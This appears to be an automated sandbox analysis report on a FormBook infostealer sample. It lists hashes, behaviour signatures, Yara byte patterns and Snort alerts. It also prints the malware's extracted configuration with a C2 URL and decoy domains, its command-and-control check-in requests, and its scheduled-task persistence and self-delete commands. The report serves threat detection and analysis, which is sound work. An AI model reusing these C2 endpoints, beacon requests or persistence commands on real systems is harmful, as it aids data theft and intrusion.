Loading ...

Play interactive tourEdit tour

Analysis Report 08917506_by_Libranalysis

Overview

General Information

Sample Name:08917506_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:403903
MD5:089175069d5c095f078b7f8a3b28a22d
SHA1:a563615dfe562e7a11c2b7f21dcfcd412594eeee
SHA256:173797a7a7a881f3d6230015620bae28d21b4b41b7e568c2a881b3c0829dd67e
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 08917506_by_Libranalysis.exe (PID: 1144 cmdline: 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' MD5: 089175069D5C095F078B7F8A3B28A22D)
    • schtasks.exe (PID: 5596 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 08917506_by_Libranalysis.exe (PID: 1020 cmdline: C:\Users\user\Desktop\08917506_by_Libranalysis.exe MD5: 089175069D5C095F078B7F8A3B28A22D)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xf2bf8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xf2f82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x119e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x11a1a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xfec95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x125eb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xfe781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1259a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xfed97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x125fb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xfef0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x12612f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xf399a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x11abba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xfd9fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x124c1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xf4712:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x11b932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x103d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x12afa7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x104e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        5.2.08917506_by_Libranalysis.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.08917506_by_Libranalysis.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: System File Execution Location AnomalyShow sources
          Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', ParentImage: C:\Windows\SysWOW64\schtasks.exe, ParentProcessId: 5596, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 360

          Persistence and Installation Behavior:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' , ParentImage: C:\Users\user\Desktop\08917506_by_Libranalysis.exe, ParentProcessId: 1144, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp', ProcessId: 5596

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.evrbrite.com/o86d/"], "decoy": ["marielivet.com", "shadowlovely.com", "novfarm.com", "genialnetero.com", "nj-yanhua.com", "thaihuay88.com", "iizponja.com", "stark-stg.net", "nueforma.com", "fincheckxu.com", "joycasino-2020.club", "9thwrld.com", "komofood.com", "weekendcost.com", "marczeimet.com", "santequebec.info", "arpinaindustriesllc.com", "soyakmuzayede.com", "trivesse.online", "shonanwakukengyou.com", "whatisleanmanagement.com", "9icem.com", "blueberry-intl.com", "mylifequotenow.com", "octafxmate.com", "garnogroup.com", "saurara.com", "mydreamtv.net", "1fhewm.com", "agungproduk.com", "be7tv.com", "ohyescart.com", "sherylabrahamphotography.com", "oxfordfinancialadvising.com", "xn--80aaf2ckffc3a.xn--p1acf", "firstcoastelope.com", "novaquitaine-solidaire.com", "morumi.site", "lr-tn.com", "avondalevotes.com", "saranaturals.net", "thebraidedbreadcompany.com", "recruit-japan-hcm.com", "innovate.works", "changfangxinxi.com", "ckitco.com", "lacommusic.net", "cibass.com", "cafeciberseguridad.com", "fittogo.net", "franciszekmanteau.com", "liquidmarin.com", "toky5555.xyz", "bloomberg.sucks", "bluejay.ventures", "valleywomanforwoman.com", "helmutbuntjer.com", "870830.com", "xmrxapp.com", "lashicorn.com", "visionsbarbershop.com", "cinmax.xyz", "website-bazar.com", "zenseotools.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exeReversingLabs: Detection: 17%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 08917506_by_Libranalysis.exeVirustotal: Detection: 23%Perma Link
          Source: 08917506_by_Libranalysis.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\OfCxSfBf.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: 08917506_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 08917506_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: 08917506_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: 08917506_by_Libranalysis.exe, 00000005.00000002.295591762.0000000003150000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 08917506_by_Libranalysis.exe, 00000005.00000002.295139182.0000000001550000.00000040.00000001.sdmp, ipconfig.exe, 0000000F.00000002.495544603.0000000000D30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 08917506_by_Libranalysis.exe, ipconfig.exe
          Source: Binary string: mscorrc.pdb source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 4x nop then mov esp, ebp0_2_05818E80
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 4x nop then mov esp, ebp0_2_05818E73

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 67.222.39.83:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 206.189.46.186:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49749 -> 192.0.78.24:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 162.0.232.119:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.evrbrite.com/o86d/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.cinmax.xyz
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.cinmax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.genialnetero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.joycasino-2020.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.marielivet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.firstcoastelope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.blueberry-intl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.thaihuay88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.website-bazar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.sherylabrahamphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=FLq1m09lMNVeUGxb2EGlpEcYOBglVjP6VclDGdRBVwR1mwk4Bp+oxJyzVgRWjmk7leVMWGvpeQ==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.cinmax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=ciPSY9IHIiBMUeM+AHa6rnkVhX0NcoOlsc17DR+fEw9UxF+XyC1njkrt1st9cFa0q3XsiD0AOg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.genialnetero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=sTrQNZETbqohgMY0G3QDWOyfMZqAyHA57kuO1l/GbTBT7+5tNjLfMqbR0u4OJ3a+5b59BonIRA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.joycasino-2020.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.marielivet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=LOco70LpFY5umcR4dQY6Ck5isx6bsPxuRuPfG/JQuVwPWdFiKckkP6tLRm3hZqsbjizE9R3VWg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.firstcoastelope.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=lH+NNz2eaU5LSk/yemMXIWDwl3fMAuCKISb0DcDmH6anXfUVh7p155egYD4l1a4C4v8/cW+zhg==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.blueberry-intl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=Zr1mHD0UzvWCQcI2JlGAeokzkFEIblHMxqeZtw3W9dCQQ7exnTCb8lR/2qgknbIFYyB/eFrcFw==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.thaihuay88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k+L08OvZwr0NYVY1MAp4q6WCjDapjCg57Vf4Q==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.website-bazar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4HvmT9bEqgnu31MbrCbNdKakV5eJA==&Yn=ybdHh8KP02GTtb HTTP/1.1Host: www.sherylabrahamphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cinmax.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 12:07:24 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 38 36 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /o86d/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000007.00000000.272184398.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
